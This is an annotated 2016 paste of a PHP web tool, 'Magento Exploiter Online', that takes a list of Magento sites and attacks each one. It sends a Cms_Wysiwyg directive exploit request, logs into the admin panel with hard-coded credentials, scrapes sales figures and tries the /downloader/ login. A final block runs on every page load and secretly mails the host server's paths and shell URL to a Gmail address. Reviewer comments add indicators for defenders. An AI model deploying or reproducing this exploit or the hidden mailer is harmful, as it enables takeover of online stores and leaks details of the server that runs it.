K4MVR3T717

[PHP] Magento Exploiter Online

Sep 17th, 2016
<!-- Operator-facing form for this script. The textarea `target` is posted back to the same
     URL (action=""), one site per line, and the PHP block further down sends server-side
     requests to every entry. No authentication is visible on this page, so anyone who can
     load it can make the hosting server issue those requests. -->
  1. <title>Magento Exploiter</title>
  2. <link rel="SHORTCUT ICON" href="http://jonasvanineveld.nl/wp-content/uploads/2013/02/magento.png"/>
  3. <meta name="description" content="Magento Exploiter Online" />
  4.  
  5. <body bgcolor="black" >
  6. <font color="red">
  7. <center>
  8. <font face="monospace"><br>
  9. <a href="https://www.facebook.com/groups/995475240559728/" target="_blank"><img src="https://1.bp.blogspot.com/-3AtjsZxEMJU/V8s5s2CYw1I/AAAAAAAAAiU/hXjMCFv8RTwUUpCg00lFmLv6LvxrX0WKgCEw/s320/LuLIFS.png" width="300" height="280"/></a>
  10. <h2> Magento Exploiter Online </h2><br>
  11.  
  12. <font color="white">
  13. <form method="post" action="">
  14. <textarea placeholder="http://site.com" style="resize:none;background:#191a19;
  15. color:white;
  16. width: 350px;
  17. border:1px gray;
  18. padding:5px;
  19. height: 90px;" name="target" required></textarea><br><br>
  20.  
  21.  
  22. <input style="background:#45444d;
  23. color:white;
  24. border:1px gray;
  25. padding:1px;
  26. width:50px;
  27. height:30px" type=submit name=submit value="Start"><br>
  28. </form>
  29. </p>
  30.  
  31. <!-- end of the textarea form -->
  32.  
  33. <!-- start -->
  34.  
  35. <?php
  36. /// Magento Exploter Online!
  37. /// Recoded By K4MVR3T717
  38. /// Indonesian Freedom Security
  39.  
// All PHP error output is switched off and the execution time limit is removed, so the
// script stays silent on failures and keeps running for as long as the posted list takes.
  40. error_reporting(0);
  41. set_time_limit(0);
  42.  
// Removes the literal `<span class="price">` opening tag and every `</span>` from the
// given string and returns what is left. It is called on the two values shown as
// "Lifetime Sales" and "Average Order" in the result card.
  43. function bersihkan($htmltags) {
  44. $htmltags = str_replace('<span class="price">','',$htmltags);
  45. $htmltags = str_replace('</span>','',$htmltags);
  46. return $htmltags;
  47.  
  48. }
  49.  
// Fixed request bodies and paths that are sent to every target. For defenders these are
// the log indicators of this tool: a POST to /admin/Cms_Wysiwyg/directive/index/ whose
// body carries `___directive=` and `forwarded=1`, followed by login POSTs to /admin/ and
// /downloader/ using the hard-coded account names below.
// NOTE(review): the `filter=` value is elided in this copy of the paste, so the first
// request body is incomplete as shown.
// NOTE(review): the script logs in as `stupid` right after the first request, so that
// request presumably creates the account; treat an admin user with that name on a
// Magento install as a compromise indicator and confirm against the admin user table.
  50. ///postdata
  51.  
  52. $postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  53. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=stupid&login%5Bpassword%5D=stupid48";
  54. $postdwn = "username=kamvret&password=kamvret717";
  55. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  56. $pagelog = "/admin/";
  57. $pagedwn = "/downloader/";
  58.  
// Sends one form-encoded POST of $data to $url.$page and returns the raw response.
//   $url  - site prefix taken from the posted target list (not validated here)
//   $data - request body string
//   $page - path appended to $url
// Returns the response headers and body as one string (CURLOPT_HEADER is on), or
// whatever curl_exec() yields on failure.
// Traits a defender can match on: the fixed Firefox 2.0.0.6 User-Agent string, the
// fixed Content-Type header, and a `cookie.txt` file written to the script's working
// directory. TLS peer verification is turned off and redirects are followed.
  59. function stupid_CURL($url,$data,$page) {
  60. $ch = curl_init();
  61. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  62. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  63. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  64. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  65. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  66. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  67. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  68. curl_setopt ($ch, CURLOPT_POST, 1);
  69. $headers = array();
  70. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  71.  
  72. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  73. curl_setopt ($ch, CURLOPT_HEADER, 1);
  74. $result = curl_exec ($ch);
  75. curl_close($ch);
  76. return $result;
  77. }
// Main flow. For every line of the posted `target` field the hosting server sends up to
// three POSTs (directive request, admin login with the hard-coded account, /downloader/
// login) and then prints a result card for that site.
// $banner is never assigned in the visible code, so this print emits nothing.
  78. print $banner;
  79.  
// `target` comes straight from the request and is split on CRLF; each entry is used as a
// URL prefix and is later echoed into the page without escaping.
  80. if(isset($_POST['target'])){
  81. $j=explode("\r\n",$_POST['target']);
  82. foreach($j as $site){
  83.  
  84. echo'<font color="red">';
  85. print "Checking, Please wait!
  86. <br>";
  87. echo'</font>';
  88. $hajar = stupid_CURL($site , $postadm, $pageadm);
  89.  
// "Success" is decided by the text `200 OK` appearing anywhere in the returned
// headers+body, so a "Success" line in captured output from this tool is a hint, not
// proof, that a given site was affected.
  90. if(preg_match('#200 OK#', $hajar)) {
  91. $expres = "Success";
  92. $ceklog = stupid_CURL($site , $postlog, $pagelog);
  93.  
// A `302 Moved` in the login response is taken as a successful admin login. The first
// two `<span class="price">` matches in that response are kept and shown as
// "Lifetime Sales" and "Average Order".
  94. if(preg_match('#302 Moved#', $ceklog)) {
  95. preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
  96. foreach($match as $val)
  97. {
  98. $ltm = $val[0];
  99. $avo = $val[1];
  100. break;
  101. }
  102. $admlog = "Success";
  103. $user = "stupid";
  104. $pass = "stupid48";
  105. $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
  106. if(preg_match('#Return to Admin#', $cekdwn)) {
  107. $dwnlog = "Login Success";
  108. }else {
  109. $dwnlog = "Login Failed";
  110. }
  111. }else {
  112. $admlog = "Failed";
  113. $user = "NULL";
  114. $pass = "NULL";
  115. }
  116. }else {
  117. $admlog = "Failed";
  118. $expres = "Failed";
  119. $user = "NULL";
  120. $pass = "NULL";
  121. $dwnlog = "Login Failed";
  122. $ltm = "NULL";
  123. $avo = "NULL";
  124. }
  125.  
// Result card. $site and the scraped values are concatenated into HTML as-is.
  126. ///echo result
  127. $logger = '
  128. <br>
  129. <font color="blue">
  130. <h4>[ '.$site.' ]</h4></font><br>
  131. Exploiting : <font color="green">'.$expres.'</font><br>
  132. Login Admin : <font color="green">'.$admlog.'</font><br>
  133. Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
  134. Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
  135. Downloader : <font color="red">'.$dwnlog.'</font><br>
  136. Username :<font color="cyan"><b> '.$user.'</font></b><br>
  137. Password :<font color="cyan"><b> '.$pass.'</font></b><br>
  138. <br><br>
  139. <font color="red">
  140. <h2>Indonesian Freedom Security</h2>';
  141. echo $logger;
  142. /// Magento Exploiter Online!
  143. /// Recoded By K4MVR3T717
  144. /// Indonesian Freedoom Security
  145. }
  146. }
  147. ?>
  148. <?php
// Second, separate PHP block that runs unconditionally on every page load, whether or
// not the form was submitted. It e-mails details of the server hosting this script to a
// hard-coded address: document root, server admin, server software, the script's own
// URL, and the Host header. Whoever deploys the page therefore reports its location to
// a third party. The labels are Turkish (roughly "file path", "server operating system",
// "hunted site").
// Detection: outbound mail from the web server's PHP process with this subject line, or
// a trailing mail() block like this one in any PHP file found on a server.
  149. $kime="aqpunk21@gmail.com";
  150. $baslik="-=[ PESANAN SHELL ]=-";
  151. $spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
  152. $spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
  153. $spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
  154. $spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
  155. $spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
  156. mail($kime, $baslik, $spyhackerz);
  157. ?>